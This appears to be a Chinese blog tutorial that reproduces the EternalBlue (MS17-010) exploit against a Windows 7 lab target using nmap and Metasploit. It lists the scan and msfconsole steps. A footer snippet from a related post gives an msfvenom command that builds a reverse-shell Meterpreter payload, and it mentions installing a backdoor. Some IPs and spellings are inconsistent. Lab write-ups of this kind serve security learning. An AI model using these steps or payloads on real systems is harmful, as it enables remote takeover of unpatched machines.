永恒之蓝(ms-17-010)

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量403 收藏 4
点赞数 4
分类专栏: 常见漏洞复现 文章标签: 威胁分析 HW 网络安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/140521789
版权

文章目录

虚拟机环境

    1)攻击机:kali linux(192.168.47.255)

        镜像文件下载:https://developer.aliyun.com/mirror/

     2) 渗透靶机: Windows 7(192.168.47.131)

matesploit

    matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。

kali基本配置

1.检查更新:

    apt update
    apt install metasploit-framework

在这里插入图片描述

换源vim /etc/apt/sources.list

来到这个页面后的第一部是按键盘上的“i”键,左下角出现“插入”后说明操作正确。

在这里插入图片描述
在这里插入图片描述

使用“#”将原本的源给注释掉。

从下面的源内选择一个复制下来准备粘贴进去(都是优质源,复制哪个都可以)。

中科大Kali镜像源

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

阿里云Kali镜像源

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

清华大学Kali镜像源

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

漏洞利用步骤

1.msfconsole #进入Meatasploit
2.saerch ms17-010 #命令搜索漏洞编号ms17-010相关模块

在这里插入图片描述

在这里插入图片描述

nmap漏洞探测

• nmap -sT -sC -sV -O 192.168.154.250 -p 0-65535
-sT:TCP全连接扫描
-sC:使用内置脚本进行扫描
-sV:识别服务版本
-O:识别系统
-P:指定端口扫描(0-65535为全端口)

在这里插入图片描述
445端口开放尝试ms17010

搜索版本漏洞的方法:

1.searchsploit xxxx(eg:IIS,Apache)
2.进入MSF模块后search
3.上网搜索

选择攻击模版:

use 0
在这里插入图片描述

设置靶机地址:

在这里插入图片描述

查看反弹shell 的语句:

在这里插入图片描述

查看支持攻击的目标:

在这里插入图片描述

设置攻击对象开始攻击

在这里插入图片描述

让靶机弹出计算器:

在这里插入图片描述

尝试运行一个:screenshare—实时监控当前主机界面

kui954
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAgent 服务器搭建
我了解豹女就像农民伯伯了解大米
03-19 2255
目录 1、目录结构 2、启动CSAgent 3、参数介绍: coball Strike: 视图:View: 攻击: Attacks: 报告:Reporting: 帮助:Help: 4、简单复现运用: 凭证提权: 浏览探测: 代理转发: 会话操作: 会话交互: 资源下载: 1、目录结构 agscript 拓展应用的脚本 c2lint 用于检查 profile 的错误异常 teamserver 服务...
渗透测试实战-CS工具使用
weixin_60250620的博客
04-10 291
Cobalt Strike一款以由美国redteam团队,研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具。它是一款基于java的渗透测试神器, 常被业界人称为CS, 也被戏称为“线上多人运动平台 ”。Cobalt Strike集成了端口转发、 扫描多模式端口Listener、 Windows exe程序生成、Windows dll动态链接库生成、java程序生成、 office宏代码生成, 包括站点克隆获取浏览器的相关信息等。
falcon-agent模块代码里执行sys.CmdOutBytes命令导致的问题
cyh的博客
03-23 236
背景介绍 在agent模块提供了一个方法,方法里的主要逻辑是通过内置的sys.CmdOutBytes函数,调用linux的sh -c命令。 http.HandleFunc("/run", func(w http.ResponseWriter, r *http.Request) { if r.ContentLength == 0 { http.Error(w, "body is blank", http.StatusBadRequest) return } bs, err := io
永恒之蓝 ms17-010
来日可期的博客
10-24 1122
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1650
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
永恒之蓝ms17-010的利用
黑战士的博客
04-25 1271
实验环境:Kali虚拟机:攻击机Win7虚拟机:目标机主要工具:metasploit##获取meterpreter17-010可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。利用漏洞反弹shell,获取meterpreter,目标机器不能装360或需关闭360。##确认用户权限可以看到是system权限。也可以直接在meterpreter中运行getuid##提权看到"got system via technique…"字样,提权成功。
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝ms17-010漏洞
2301_79448933的博客
04-03 265
简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机。nmap --script=vuln IP(靶机的ip)此时会发现扫描出了四个漏洞,其中就有ms17-010。4.我们直接使用0 直接输入use+前面的编号就可以。使用模块名称 check 为yes的都能使用。会出现很多画面(每次可能都不同)7.输入exploit 进行攻击。命令行输入msfconsole。2.msfconsole测试。3.查找ms17-010
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 1664
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝,MS17-010,漏洞检测工具
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之蓝(MS17-010
BvxiE的博客
12-26 3957
温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!
YARA:第十四章-基于JSON文件的威胁分析
qq_29490749的博客
07-18 872
YARA是一个用于恶意软件检测和分析的工具,它的作用主要包括以下几个方面:(1)恶意软件检测:YARA最核心的功能是检测恶意软件。用户可以编写规则来识别特定的恶意软件特征,如字符串、代码序列、数据结构等。(2)自动化威胁识别:通过预定义的规则,YARA可以自动化地识别和分类潜在的威胁,减少人工分析的需求。(3)文件分析:YARA可以扫描文件内容,识别出文件中可能包含的恶意代码或数据。(4)内存分析:YARA不仅可以分析文件,还可以分析内存中的进程,帮助检测运行中的恶意软件。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 640
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
永恒之蓝ms17-010虚拟机
05-10
常见的永恒之蓝ms17-010虚拟机有Metasploitable、VulnHub等,你可以在官网上下载相应的虚拟机镜像,并通过虚拟机软件(如VMware、VirtualBox)进行安装和使用。需要注意的是,这种虚拟机仅用于学习和测试目的,不得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值